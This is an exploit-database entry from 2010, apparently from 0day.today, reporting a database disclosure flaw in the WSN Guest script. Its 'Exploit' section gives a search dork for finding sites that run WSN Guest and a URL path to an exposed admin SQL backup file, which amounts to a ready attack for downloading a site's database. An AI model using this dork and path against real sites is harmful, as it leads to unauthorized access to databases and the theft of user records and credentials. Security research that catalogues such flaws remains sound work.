id: 10787
date: 02/07/2010
title: WSN Guest Database Disclosure Vulnerability
author: HackXBack
cves: 

===========================================
WSN Guest Database Disclosure Vulnerability
===========================================

####################################################################
.:. Author : HackXBack 
.:. Script : WSN Guest
.:. Bug Type : Database Disclosure
.:. Dork : "Powered by WSN Guest"
 
####################################################################
 
===[ Exploit ]===
 
http://server/wsnguest/admin/backup.sql
 
 
####################################################################



#  0day.today [2023-03-24]  #